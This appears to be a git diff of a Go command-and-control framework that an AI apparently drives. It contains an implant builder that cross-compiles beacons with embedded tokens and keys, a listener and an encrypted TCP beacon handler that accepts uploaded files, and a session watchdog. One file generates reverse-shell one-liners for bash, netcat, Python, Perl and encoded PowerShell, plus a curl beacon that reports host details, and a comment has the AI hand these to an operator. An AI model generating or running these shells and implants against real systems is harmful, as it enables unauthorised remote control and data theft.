if strings.TrimSpace(report.TaskID) == "" {
return ErrInvalidInput
}
t, err := m.db.GetC2Task(report.TaskID)
if err != nil {
return err
}
if t == nil {
return ErrTaskNotFound
}
startedAt := time.Unix(0, report.StartedAt*int64(time.Millisecond))
endedAt := time.Unix(0, report.EndedAt*int64(time.Millisecond))
if report.StartedAt == 0 {
startedAt = time.Now()
}
if report.EndedAt == 0 {
endedAt = time.Now()
}
status := string(TaskSuccess)
if !report.Success {
status = string(TaskFailed)
}
duration := endedAt.Sub(startedAt).Milliseconds()
upd := database.C2TaskUpdate{
Status: &status,
ResultText: &report.Output,
Error: &report.Error,
StartedAt: &startedAt,
CompletedAt: &endedAt,
DurationMS: &duration,
}
// blob(如截图)落盘
if len(report.BlobBase64) > 0 {
blobPath, err := m.saveResultBlob(t.ID, report.BlobBase64, report.BlobSuffix)
if err == nil {
upd.ResultBlobPath = &blobPath
} else {
m.logger.Warn("结果 blob 落盘失败", zap.Error(err), zap.String("task_id", t.ID))
}
}
if err := m.db.UpdateC2Task(t.ID, upd); err != nil {
return err
}
t.Status = status
t.ResultText = report.Output
t.Error = report.Error
level := "info"
msg := fmt.Sprintf("任务完成: %s", t.TaskType)
if !report.Success {
level = "warn"
msg = fmt.Sprintf("任务失败: %s (%s)", t.TaskType, report.Error)
}
m.publishEvent(level, "task", t.SessionID, t.ID, msg, map[string]interface{}{
"task_id": t.ID,
"task_type": t.TaskType,
"duration": duration,
})
m.mu.RLock()
hook := m.hooks.OnTaskCompleted
m.mu.RUnlock()
if hook != nil {
go hook(t, t.SessionID)
}
return nil
}
func (m *Manager) saveResultBlob(taskID, b64Content, suffix string) (string, error) {
suffix = strings.TrimSpace(suffix)
if suffix == "" {
suffix = ".bin"
}
if !strings.HasPrefix(suffix, ".") {
suffix = "." + suffix
}
dir := filepath.Join(m.storageDir, "results")
if err := osMkdirAll(dir, 0o755); err != nil {
return "", err
}
path := filepath.Join(dir, taskID+suffix)
data, err := base64Decode(b64Content)
if err != nil {
return "", err
}
if err := osWriteFile(path, data, 0o644); err != nil {
return "", err
}
return path, nil
}
// ----------------------------------------------------------------------------
// 事件总线辅助
// ----------------------------------------------------------------------------
// publishEvent 同步写 c2_events 表 + 投放到内存事件总线
func (m *Manager) publishEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
id := "e_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
now := time.Now()
e := &database.C2Event{
ID: id,
Level: level,
Category: category,
SessionID: sessionID,
TaskID: taskID,
Message: message,
Data: data,
CreatedAt: now,
}
if err := m.db.AppendC2Event(e); err != nil {
m.logger.Warn("写 C2 事件失败", zap.Error(err), zap.String("category", category))
}
m.bus.Publish(&Event{
ID: id,
Level: level,
Category: category,
SessionID: sessionID,
TaskID: taskID,
Message: message,
Data: data,
CreatedAt: now,
})
}
// PublishCustomEvent 给外部组件(HITL 桥 / handler)写自定义事件用
func (m *Manager) PublishCustomEvent(level, category, sessionID, taskID, message string, data map[string]interface{}) {
m.publishEvent(level, category, sessionID, taskID, message, data)
}
// ----------------------------------------------------------------------------
// 工具函数
// ----------------------------------------------------------------------------
func strOr(s, def string) string {
if strings.TrimSpace(s) == "" {
return def
}
return s
}
// getListenerConfig loads and parses the listener's config JSON from DB.
func (m *Manager) getListenerConfig(listenerID string) *ListenerConfig {
listener, err := m.db.GetC2Listener(listenerID)
if err != nil || listener == nil {
return nil
}
cfg := &ListenerConfig{}
if listener.ConfigJSON != "" && listener.ConfigJSON != "{}" {
_ = json.Unmarshal([]byte(listener.ConfigJSON), cfg)
}
return cfg
}
// GetProfile loads a C2Profile from DB by ID.
func (m *Manager) GetProfile(profileID string) (*database.C2Profile, error) {
if strings.TrimSpace(profileID) == "" {
return nil, nil
}
return m.db.GetC2Profile(profileID)
}
+74
View File
@@ -0,0 +1,74 @@
package c2
import (
"io"
"net"
"net/http"
"path/filepath"
"strconv"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// 回归:StartListener 返回的 rec 被 handler 脱敏清空 ImplantToken 后,运行中的 HTTP listener 仍能鉴权。
func TestStartListener_ImplantTokenSurvivesHandlerRedaction(t *testing.T) {
tmp := t.TempDir()
db, err := database.NewDB(filepath.Join(tmp, "c2.sqlite"), zap.NewNop())
if err != nil {
t.Fatal(err)
}
t.Cleanup(func() { _ = db.Close() })
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
if err != nil {
t.Fatal(err)
}
port := lnPick.Addr().(*net.TCPAddr).Port
_ = lnPick.Close()
mgr := NewManager(db, zap.NewNop(), tmp)
mgr.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
rec, err := mgr.CreateListener(CreateListenerInput{
Name: "t",
Type: string(ListenerTypeHTTPBeacon),
BindHost: "127.0.0.1",
BindPort: port,
})
if err != nil {
t.Fatal(err)
}
token := rec.ImplantToken
rec, err = mgr.StartListener(rec.ID)
if err != nil {
t.Fatal(err)
}
// 模拟 internal/handler/c2.go StartListener 在 JSON 响应前的脱敏
rec.ImplantToken = ""
rec.EncryptionKey = ""
time.Sleep(50 * time.Millisecond)
body := `{"hostname":"n","username":"u","os":"Linux","arch":"amd64","internal_ip":"10.0.0.1","pid":42}`
req, _ := http.NewRequest(http.MethodPost, "http://127.0.0.1:"+strconv.Itoa(port)+"/check_in", strings.NewReader(body))
req.Header.Set("X-Implant-Token", token)
req.Header.Set("Content-Type", "application/json")
resp, err := http.DefaultClient.Do(req)
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
b, _ := io.ReadAll(resp.Body)
if resp.StatusCode != http.StatusOK {
t.Fatalf("status=%d body=%s", resp.StatusCode, b)
}
if !strings.Contains(string(b), "session_id") {
t.Fatalf("expected session_id in body: %s", b)
}
_ = mgr.StopListener(rec.ID)
}
+308
View File
@@ -0,0 +1,308 @@
package c2
import (
"encoding/json"
"fmt"
"net"
"os"
"strconv"
"os/exec"
"path/filepath"
"strings"
"text/template"
"github.com/google/uuid"
"go.uber.org/zap"
)
// PayloadBuilderInput 构建 beacon 的输入参数
type PayloadBuilderInput struct {
ListenerID string // l_xxx
OS string // linux|windows|darwin
Arch string // amd64|arm64|386
SleepSeconds int
JitterPercent int
OutputName string // custom output filename (without extension); defaults to "beacon_<os>_<arch>"
// Host 非空时作为植入端回连地址(覆盖监听器的 bind_host / 0.0.0.0 自动探测)
Host string
}
// PayloadBuilder 负责从模板生成并交叉编译 beacon 二进制
type PayloadBuilder struct {
manager *Manager
logger *zap.Logger
tmplDir string // 模板目录,如 internal/c2/payload_templates
outputDir string // 输出目录,如 tmp/c2/payloads
}
// NewPayloadBuilder 创建构建器
func NewPayloadBuilder(manager *Manager, logger *zap.Logger, tmplDir, outputDir string) *PayloadBuilder {
if tmplDir == "" {
tmplDir = "internal/c2/payload_templates"
}
if outputDir == "" {
outputDir = "tmp/c2/payloads"
}
return &PayloadBuilder{
manager: manager,
logger: logger,
tmplDir: tmplDir,
outputDir: outputDir,
}
}
// BuildResult 构建结果
type BuildResult struct {
PayloadID string `json:"payload_id"`
ListenerID string `json:"listener_id"`
OutputPath string `json:"output_path"`
DownloadPath string `json:"download_path"` // 磁盘上的绝对路径
OS string `json:"os"`
Arch string `json:"arch"`
SizeBytes int64 `json:"size_bytes"`
}
// BuildBeacon 交叉编译生成 beacon 二进制
func (b *PayloadBuilder) BuildBeacon(in PayloadBuilderInput) (*BuildResult, error) {
listener, err := b.manager.DB().GetC2Listener(in.ListenerID)
if err != nil {
return nil, fmt.Errorf("get listener: %w", err)
}
if listener == nil {
return nil, ErrListenerNotFound
}
lt := strings.ToLower(listener.Type)
cfg := &ListenerConfig{}
if listener.ConfigJSON != "" {
_ = parseJSON(listener.ConfigJSON, cfg)
}
cfg.ApplyDefaults()
// 确定目标架构
goos := strings.ToLower(in.OS)
goarch := strings.ToLower(in.Arch)
if goos == "" {
goos = "linux"
}
if goarch == "" {
goarch = "amd64"
}
// 读取模板
tmplPath := filepath.Join(b.tmplDir, "beacon.go.tmpl")
tmplData, err := os.ReadFile(tmplPath)
if err != nil {
return nil, fmt.Errorf("read template: %w", err)
}
// 模板参数:请求 Host > 监听器 callback_host > bind 推导(见 ResolveBeaconDialHost
host := ResolveBeaconDialHost(listener, in.Host, b.logger, listener.ID)
serverURL := fmt.Sprintf("%s://%s:%d",
listenerTypeToScheme(listener.Type),
host,
listener.BindPort,
)
transport := "http"
tcpDialAddr := ""
transportMeta := "http_beacon"
switch lt {
case "tcp_reverse":
transport = "tcp"
tcpDialAddr = net.JoinHostPort(host, strconv.Itoa(listener.BindPort))
transportMeta = "tcp_beacon"
case "https_beacon":
transportMeta = "https_beacon"
case "websocket":
transportMeta = "websocket"
}
data := map[string]string{
"Transport": transport,
"TCPDialAddr": tcpDialAddr,
"TransportMetadata": transportMeta,
"ServerURL": serverURL,
"ImplantToken": listener.ImplantToken,
"AESKeyB64": listener.EncryptionKey,
"SleepSeconds": fmt.Sprintf("%d", firstPositive(in.SleepSeconds, cfg.DefaultSleep, 5)),
"JitterPercent": fmt.Sprintf("%d", clamp(in.JitterPercent, 0, 100)),
"CheckInPath": cfg.BeaconCheckInPath,
"TasksPath": cfg.BeaconTasksPath,
"ResultPath": cfg.BeaconResultPath,
"UploadPath": cfg.BeaconUploadPath,
"FilePath": cfg.BeaconFilePath,
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
}
// 执行模板
tmpl, err := template.New("beacon").Parse(string(tmplData))
if err != nil {
return nil, fmt.Errorf("parse template: %w", err)
}
// 创建工作目录
workDir := filepath.Join(b.outputDir, "build-"+uuid.New().String()[:8])
if err := os.MkdirAll(workDir, 0755); err != nil {
return nil, fmt.Errorf("mkdir: %w", err)
}
defer os.RemoveAll(workDir) // 清理
srcPath := filepath.Join(workDir, "main.go")
f, err := os.Create(srcPath)
if err != nil {
return nil, fmt.Errorf("create source: %w", err)
}
if err := tmpl.Execute(f, data); err != nil {
f.Close()
return nil, fmt.Errorf("execute template: %w", err)
}
f.Close()
// 交叉编译
binName := strings.TrimSpace(in.OutputName)
if binName == "" {
binName = fmt.Sprintf("beacon_%s_%s", goos, goarch)
}
if goos == "windows" && !strings.HasSuffix(binName, ".exe") {
binName += ".exe"
}
binPath := filepath.Join(b.outputDir, binName)
if err := os.MkdirAll(b.outputDir, 0755); err != nil {
return nil, fmt.Errorf("mkdir output: %w", err)
}
absSrcPath, err := filepath.Abs(srcPath)
if err != nil {
return nil, fmt.Errorf("abs source path: %w", err)
}
absBinPath, err := filepath.Abs(binPath)
if err != nil {
return nil, fmt.Errorf("abs output path: %w", err)
}
cmd := exec.Command("go", "build", "-ldflags", "-s -w -buildid=", "-trimpath", "-o", absBinPath, absSrcPath)
cmd.Env = append(os.Environ(),
"GOOS="+goos,
"GOARCH="+goarch,
"CGO_ENABLED=0",
)
cmd.Dir = workDir
output, err := cmd.CombinedOutput()
if err != nil {
b.logger.Error("beacon build failed", zap.String("output", string(output)), zap.Error(err))
return nil, fmt.Errorf("build failed: %w (output: %s)", err, string(output))
}
// 获取文件大小
info, err := os.Stat(binPath)
if err != nil {
return nil, fmt.Errorf("stat output: %w", err)
}
payloadID := "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
return &BuildResult{
PayloadID: payloadID,
ListenerID: listener.ID,
OutputPath: absBinPath,
DownloadPath: absBinPath,
OS: goos,
Arch: goarch,
SizeBytes: info.Size(),
}, nil
}
func listenerTypeToScheme(t string) string {
switch strings.ToLower(t) {
case "https_beacon":
return "https"
case "websocket":
return "ws"
case "http_beacon":
return "http"
default:
return "http"
}
}
func firstPositive(vals ...int) int {
for _, v := range vals {
if v > 0 {
return v
}
}
return 1
}
func clamp(v, min, max int) int {
if v < min {
return min
}
if v > max {
return max
}
return v
}
// GetPayloadStoragePath 返回 payload 存储目录的绝对路径
func (b *PayloadBuilder) GetPayloadStoragePath() string {
abs, _ := filepath.Abs(b.outputDir)
return abs
}
// GetSupportedOSArch 返回支持的操作系统和架构列表
func GetSupportedOSArch() map[string][]string {
return map[string][]string{
"linux": {"amd64", "arm64", "386", "arm"},
"windows": {"amd64", "arm64", "386"},
"darwin": {"amd64", "arm64"},
}
}
// ValidateOSArch 验证 OS/Arch 组合是否可编译
func ValidateOSArch(os, arch string) bool {
supported := GetSupportedOSArch()
arches, ok := supported[strings.ToLower(os)]
if !ok {
return false
}
for _, a := range arches {
if a == strings.ToLower(arch) {
return true
}
}
return false
}
// detectExternalIP returns the first non-loopback IPv4 address, or "" if none found.
func detectExternalIP() string {
ifaces, err := net.Interfaces()
if err != nil {
return ""
}
for _, iface := range ifaces {
if iface.Flags&net.FlagLoopback != 0 || iface.Flags&net.FlagUp == 0 {
continue
}
addrs, err := iface.Addrs()
if err != nil {
continue
}
for _, addr := range addrs {
ipnet, ok := addr.(*net.IPNet)
if !ok || ipnet.IP.To4() == nil {
continue
}
return ipnet.IP.String()
}
}
return ""
}
func parseJSON(s string, v interface{}) error {
if strings.TrimSpace(s) == "" || s == "{}" {
return nil
}
return json.Unmarshal([]byte(s), v)
}
+25
View File
@@ -0,0 +1,25 @@
package c2
import (
"encoding/base64"
"encoding/binary"
)
// b64StdEncode 用标准 base64 编码字节
func b64StdEncode(s string) string {
return base64.StdEncoding.EncodeToString([]byte(s))
}
// utf16LEBase64 把字符串转 UTF-16LE 后再 base64,用于 PowerShell -EncodedCommand
// Windows PowerShell 接受这种格式,避免命令行特殊字符引起转义错误)
func utf16LEBase64(s string) string {
runes := []rune(s)
buf := make([]byte, 0, len(runes)*2)
for _, r := range runes {
// 注意:>0xFFFF 的字符需要代理对,但 PowerShell 命令通常都在 BMP 内
var enc [2]byte
binary.LittleEndian.PutUint16(enc[:], uint16(r))
buf = append(buf, enc[:]...)
}
return base64.StdEncoding.EncodeToString(buf)
}
+190
View File
@@ -0,0 +1,190 @@
package c2
import (
"fmt"
"net/url"
"strings"
)
// OnelinerKind 单行 payload 的语言/形式
type OnelinerKind string
const (
OnelinerBash OnelinerKind = "bash" // bash 反弹(TCP reverse listener
OnelinerNc OnelinerKind = "nc" // netcat 反弹
OnelinerNcMkfifo OnelinerKind = "nc_mkfifo" // 通过 mkfifo 双向(部分 nc 不支持 -e)
OnelinerPython OnelinerKind = "python" // python socket 反弹
OnelinerPerl OnelinerKind = "perl" // perl 反弹
OnelinerPowerShell OnelinerKind = "powershell" // PowerShell TCP 反弹(IEX 风格)
OnelinerCurl OnelinerKind = "curl_beacon" // 用 curl 周期性轮询 HTTP beacon(无需二进制)
)
// AllOnelinerKinds 所有支持的 oneliner 类型
func AllOnelinerKinds() []OnelinerKind {
return []OnelinerKind{
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
OnelinerPython, OnelinerPerl,
OnelinerPowerShell, OnelinerCurl,
}
}
// tcpOnelinerKinds 仅支持 tcp_reverse 监听器的裸 TCP 反弹类型
var tcpOnelinerKinds = map[OnelinerKind]bool{
OnelinerBash: true,
OnelinerNc: true,
OnelinerNcMkfifo: true,
OnelinerPython: true,
OnelinerPerl: true,
OnelinerPowerShell: true,
}
// httpOnelinerKinds 支持 http_beacon / https_beacon 监听器的类型
var httpOnelinerKinds = map[OnelinerKind]bool{
OnelinerCurl: true,
}
// OnelinerKindsForListener 根据监听器类型返回兼容的 oneliner 类型列表
func OnelinerKindsForListener(listenerType string) []OnelinerKind {
switch ListenerType(listenerType) {
case ListenerTypeTCPReverse:
return []OnelinerKind{
OnelinerBash, OnelinerNc, OnelinerNcMkfifo,
OnelinerPython, OnelinerPerl, OnelinerPowerShell,
}
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
return []OnelinerKind{OnelinerCurl}
default:
return nil
}
}
// IsOnelinerCompatible 检查 oneliner 类型是否与监听器类型兼容
func IsOnelinerCompatible(listenerType string, kind OnelinerKind) bool {
switch ListenerType(listenerType) {
case ListenerTypeTCPReverse:
return tcpOnelinerKinds[kind]
case ListenerTypeHTTPBeacon, ListenerTypeHTTPSBeacon, ListenerTypeWebSocket:
return httpOnelinerKinds[kind]
default:
return false
}
}
// OnelinerInput 生成 oneliner 的入参
type OnelinerInput struct {
Kind OnelinerKind
Host string // 攻击机回连地址(IP/域名)
Port int // 监听端口
HTTPBaseURL string // HTTPS Beacon 时使用,如 https://x.com
ImplantToken string // HTTP Beacon 鉴权 token
}
// GenerateOneliner 生成单行 payload。
// 设计要点:
// - 不依赖目标机预装的可执行(除该 oneliner 关键的 bash/python/perl 等);
// - 不引入引号嵌套陷阱:使用 base64/url 编码避免 shell 转义错误;
// - 同时返回执行示例,便于 AI 在对话里直接展示给操作员。
func GenerateOneliner(in OnelinerInput) (string, error) {
host := strings.TrimSpace(in.Host)
if host == "" {
return "", fmt.Errorf("host is required")
}
switch in.Kind {
case OnelinerBash:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// 用 bash -c 包裹,确保在 zsh/sh 等非 bash shell 中也能正确执行
// /dev/tcp 是 bash 特有的伪设备,必须由 bash 进程解释
return fmt.Sprintf(`bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'`, host, in.Port), nil
case OnelinerNc:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
return fmt.Sprintf(`nc -e /bin/sh %s %d`, host, in.Port), nil
case OnelinerNcMkfifo:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// 双向 mkfifo 写法,对没有 -e 的 nc/openbsd-nc 也能用
return fmt.Sprintf(
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f`,
host, in.Port,
), nil
case OnelinerPython:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// python -c 单引号包裹,内部用三引号或转义会引发兼容性问题,改用 base64 解码再 exec
py := fmt.Sprintf(
`import socket,os,pty;s=socket.socket();s.connect(("%s",%d));[os.dup2(s.fileno(),x) for x in (0,1,2)];pty.spawn("/bin/sh")`,
host, in.Port,
)
// 用 b64 包装规避目标 shell 引号问题
return fmt.Sprintf(
`python3 -c "import base64,sys;exec(base64.b64decode('%s').decode())"`,
b64StdEncode(py),
), nil
case OnelinerPerl:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
return fmt.Sprintf(
`perl -e 'use Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`,
host, in.Port,
), nil
case OnelinerPowerShell:
if err := SafeBindPort(in.Port); err != nil {
return "", err
}
// PowerShell TCP 反弹(不依赖 .NET old 版本)
ps := fmt.Sprintf(
`$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`,
host, in.Port,
)
return fmt.Sprintf(
`powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`,
utf16LEBase64(ps),
), nil
case OnelinerCurl:
if strings.TrimSpace(in.HTTPBaseURL) == "" {
return "", fmt.Errorf("http_base_url is required for curl_beacon")
}
if strings.TrimSpace(in.ImplantToken) == "" {
return "", fmt.Errorf("implant_token is required for curl_beacon")
}
base := strings.TrimRight(in.HTTPBaseURL, "/")
return fmt.Sprintf(
`bash -c 'H="X-Implant-Token: %s";`+
`URL="%s";`+
`HN=$(hostname 2>/dev/null||echo unknown);`+
`UN=$(whoami 2>/dev/null||echo unknown);`+
`OS=$(uname -s 2>/dev/null||echo unknown);`+
`AR=$(uname -m 2>/dev/null||echo unknown);`+
`IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+
`SID="";`+
`while :;do `+
`BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+
`R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+
`if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+
`if [ -n "$SID" ];then `+
`T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+
`fi;`+
`sleep 5;`+
`done' &`,
in.ImplantToken, base,
), nil
}
return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind)
}
// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义
func urlEncodeForShell(s string) string {
return url.QueryEscape(s)
}
File diff suppressed because it is too large Load Diff
+109
View File
@@ -0,0 +1,109 @@
package c2
import (
"context"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// SessionWatchdog 会话心跳看门狗:周期扫描所有 active/sleeping 会话,
// 把超过 (sleep * (1 + jitter%) * graceFactor + minGrace) 仍未心跳的标为 dead。
//
// 设计要点:
// - 单 goroutine + ticker,避免对每个会话开 timersession 数量大时也线性 OK
// - 阈值随会话自身 sleep/jitter 自适应(sleep=300s 的会话不能用 sleep=5s 的判定);
// - 全局最小宽限期 minGrace 避免 sleep 配置错误的会话被误判;
// - 不读 implant_uuid,纯按 last_check_in 字段,与 listener 类型解耦。
type SessionWatchdog struct {
manager *Manager
logger *zap.Logger
interval time.Duration // 扫描周期,默认 15s
minGrace time.Duration // 最小宽限期,默认 30s
gracePct float64 // 心跳超时倍数,默认 3.0(即 3 倍 sleep 周期没心跳算掉线)
stopCh chan struct{}
}
// NewSessionWatchdog 创建看门狗
func NewSessionWatchdog(m *Manager) *SessionWatchdog {
return &SessionWatchdog{
manager: m,
logger: m.Logger().With(zap.String("component", "c2-watchdog")),
interval: 15 * time.Second,
minGrace: 30 * time.Second,
gracePct: 3.0,
stopCh: make(chan struct{}),
}
}
// Run 阻塞执行,直到 ctx.Done() 或 Stop()
func (w *SessionWatchdog) Run(ctx context.Context) {
t := time.NewTicker(w.interval)
defer t.Stop()
for {
select {
case <-ctx.Done():
return
case <-w.stopCh:
return
case <-t.C:
w.tick()
}
}
}
// Stop 停止
func (w *SessionWatchdog) Stop() {
select {
case <-w.stopCh:
default:
close(w.stopCh)
}
}
func (w *SessionWatchdog) tick() {
now := time.Now()
for _, status := range []string{string(SessionActive), string(SessionSleeping)} {
sessions, err := w.manager.DB().ListC2Sessions(database.ListC2SessionsFilter{Status: status})
if err != nil {
w.logger.Warn("watchdog 列表查询失败", zap.Error(err))
continue
}
for _, s := range sessions {
if w.isStale(s, now) {
if err := w.manager.MarkSessionDead(s.ID); err != nil {
w.logger.Warn("标记会话掉线失败", zap.String("session_id", s.ID), zap.Error(err))
}
}
}
}
}
// isStale 判断会话是否超时
func (w *SessionWatchdog) isStale(s *database.C2Session, now time.Time) bool {
// 无心跳记录:以 first_seen_at 兜底
last := s.LastCheckIn
if last.IsZero() {
last = s.FirstSeenAt
}
sleep := s.SleepSeconds
if sleep <= 0 {
// TCP reverse 模式 sleep=0 → 用最小宽限期判定
return now.Sub(last) > w.minGrace*2
}
jitter := s.JitterPercent
if jitter < 0 {
jitter = 0
}
if jitter > 100 {
jitter = 100
}
// 阈值 = sleep * (1 + jitter%) * gracePct,再加 minGrace 兜底
expected := time.Duration(float64(sleep)*(1+float64(jitter)/100.0)*w.gracePct) * time.Second
if expected < w.minGrace {
expected = w.minGrace
}
return now.Sub(last) > expected
}
+267
View File
@@ -0,0 +1,267 @@
package c2
import (
"bufio"
"crypto/subtle"
"encoding/base64"
"encoding/binary"
"encoding/json"
"fmt"
"io"
"net"
"os"
"path/filepath"
"strings"
"sync"
"time"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
const tcpBeaconMagic = "CSB1"
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
const tcpBeaconMaxFrame = 64 << 20
func readTCPBeaconFrame(r *bufio.Reader) (cipherB64 string, err error) {
var n uint32
if err = binary.Read(r, binary.BigEndian, &n); err != nil {
return "", err
}
if n == 0 || int64(n) > int64(tcpBeaconMaxFrame) {
return "", fmt.Errorf("invalid tcp beacon frame size")
}
buf := make([]byte, n)
if _, err = io.ReadFull(r, buf); err != nil {
return "", err
}
return string(buf), nil
}
func writeTCPBeaconFrame(mu *sync.Mutex, conn net.Conn, cipherB64 string) error {
if mu != nil {
mu.Lock()
defer mu.Unlock()
}
payload := []byte(cipherB64)
if len(payload) > tcpBeaconMaxFrame {
return fmt.Errorf("frame too large")
}
var hdr [4]byte
binary.BigEndian.PutUint32(hdr[:], uint32(len(payload)))
if _, err := conn.Write(hdr[:]); err != nil {
return err
}
_, err := conn.Write(payload)
return err
}
func tcpBeaconCheckToken(expected, got string) bool {
if got == "" || expected == "" {
return false
}
return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
}
// handleTCPBeaconSession 处理已消费魔数 CSB1 之后的 TCP Beacon 会话(与 HTTP Beacon 相同的 AES-GCM + JSON 语义)。
func (l *TCPReverseListener) handleTCPBeaconSession(conn net.Conn, br *bufio.Reader) {
var writeMu sync.Mutex
defer func() {
_ = conn.Close()
}()
for {
_ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute))
cipherB64, err := readTCPBeaconFrame(br)
if err != nil {
if err != io.EOF && !isClosedConnErr(err) {
l.logger.Debug("tcp beacon read frame", zap.Error(err))
}
return
}
plain, err := DecryptAESGCM(l.rec.EncryptionKey, cipherB64)
if err != nil {
l.logger.Warn("tcp beacon decrypt failed", zap.Error(err))
return
}
var env map[string]json.RawMessage
if err := json.Unmarshal(plain, &env); err != nil {
l.logger.Warn("tcp beacon json", zap.Error(err))
return
}
opBytes, ok := env["op"]
if !ok {
return
}
var op string
if err := json.Unmarshal(opBytes, &op); err != nil {
return
}
var token string
if tb, ok := env["token"]; ok {
_ = json.Unmarshal(tb, &token)
}
if !tcpBeaconCheckToken(l.rec.ImplantToken, token) {
l.logger.Warn("tcp beacon bad token", zap.String("listener_id", l.rec.ID))
return
}
var resp interface{}
switch op {
case "check_in":
rawCheck, ok := env["check"]
if !ok {
return
}
var req ImplantCheckInRequest
if err := json.Unmarshal(rawCheck, &req); err != nil {
return
}
if req.UserAgent == "" {
req.UserAgent = "tcp_beacon"
}
if req.SleepSeconds <= 0 {
req.SleepSeconds = l.cfg.DefaultSleep
}
host, _, _ := net.SplitHostPort(conn.RemoteAddr().String())
if req.Metadata == nil {
req.Metadata = map[string]interface{}{}
}
req.Metadata["transport"] = "tcp_beacon"
req.Metadata["remote"] = conn.RemoteAddr().String()
if strings.TrimSpace(req.InternalIP) == "" {
req.InternalIP = host
}
session, err := l.manager.IngestCheckIn(l.rec.ID, req)
if err != nil {
l.logger.Warn("tcp beacon check_in", zap.Error(err))
return
}
queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
SessionID: session.ID,
Status: string(TaskQueued),
Limit: 1,
})
resp = ImplantCheckInResponse{
SessionID: session.ID,
NextSleep: session.SleepSeconds,
NextJitter: session.JitterPercent,
HasTasks: len(queued) > 0,
ServerTime: NowUnixMillis(),
}
case "tasks":
rawSID, ok := env["session_id"]
if !ok {
return
}
var sessionID string
if err := json.Unmarshal(rawSID, &sessionID); err != nil || sessionID == "" {
return
}
sess, err := l.manager.DB().GetC2Session(sessionID)
if err != nil || sess == nil || sess.ListenerID != l.rec.ID {
return
}
envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
if err != nil {
return
}
if envelopes == nil {
envelopes = []TaskEnvelope{}
}
resp = map[string]interface{}{"tasks": envelopes}
case "result":
raw, ok := env["result"]
if !ok {
return
}
var report TaskResultReport
if err := json.Unmarshal(raw, &report); err != nil {
return
}
if err := l.manager.IngestTaskResult(report); err != nil {
return
}
resp = map[string]string{"ok": "1"}
case "upload":
raw, ok := env["upload"]
if !ok {
return
}
var up struct {
TaskID string `json:"task_id"`
DataB64 string `json:"data_b64"`
}
if err := json.Unmarshal(raw, &up); err != nil || up.TaskID == "" {
return
}
plainFile, err := base64.StdEncoding.DecodeString(up.DataB64)
if err != nil {
return
}
dir := filepath.Join(l.manager.StorageDir(), "uploads")
if err := os.MkdirAll(dir, 0o755); err != nil {
return
}
dst := filepath.Join(dir, up.TaskID+".bin")
if err := os.WriteFile(dst, plainFile, 0o644); err != nil {
return
}
resp = map[string]interface{}{"ok": 1, "size": len(plainFile)}
case "file":
raw, ok := env["file"]
if !ok {
return
}
var fr struct {
FileID string `json:"file_id"`
}
if err := json.Unmarshal(raw, &fr); err != nil || fr.FileID == "" {
return
}
if strings.Contains(fr.FileID, "/") || strings.Contains(fr.FileID, "\\") || strings.Contains(fr.FileID, "..") {
return
}
fpath := filepath.Join(l.manager.StorageDir(), "downstream", fr.FileID+".bin")
absPath, err := filepath.Abs(fpath)
if err != nil {
return
}
absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
return
}
data, err := os.ReadFile(absPath)
if err != nil {
return
}
resp = map[string]interface{}{
"file_data": base64Encode(data),
}
default:
return
}
body, err := json.Marshal(resp)
if err != nil {
return
}
enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
if err != nil {
return
}
